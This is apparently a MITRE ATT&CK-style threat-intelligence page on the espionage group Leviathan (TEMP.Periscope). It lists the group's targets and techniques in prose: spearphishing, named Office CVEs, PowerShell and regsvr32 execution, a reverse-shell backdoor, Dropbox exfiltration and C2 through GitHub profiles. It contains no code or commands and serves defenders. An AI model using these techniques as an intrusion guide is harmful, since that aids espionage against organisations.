Group: Leviathan, TEMP.Periscope

From enterprise
Jump to: navigation, search
Leviathan, TEMP.Periscope
ID G0065
Aliases Leviathan, TEMP.Periscope
Contributors Valerii Marchuk, Cybersecurity Help s.r.o.

Leviathan is a cyber espionage group that has been active since at least 2013. The group generally targets defense and government organizations, but has also targeted a range of industries including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities in the United States, Western Europe, and along the South China Sea.12

Alias Descriptions

  • Leviathan - 1
  • TEMP.Periscope - 2

Techniques Used

  • Spearphishing Attachment - Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.1
  • Spearphishing Link - Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.1
  • Exploitation for Client Execution - Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.12
  • Scripting - Leviathan has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript.1
  • PowerShell - Leviathan has used PowerShell for execution.12
  • Regsvr32 - Leviathan has used regsvr32 for execution.1
  • Valid Accounts - Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.1
  • Binary Padding - Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.1
  • Shortcut Modification - Leviathan has used a JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.12
  • Remote File Copy - Leviathan has downloaded additional scripts and files from adversary-controlled servers.1 Leviathan has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.2
  • User Execution - Leviathan has sent spearphishing emails links and attachments attempting to get a user to click.1
  • Command-Line Interface - Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell.2
  • Code Signing - Leviathan has used stolen code signing certificates used to sign malware.2
  • BITS Jobs - Leviathan has used bitsadmin.exe to download additional tools.2
  • Data Staged - Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.2
  • Web Service - Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.2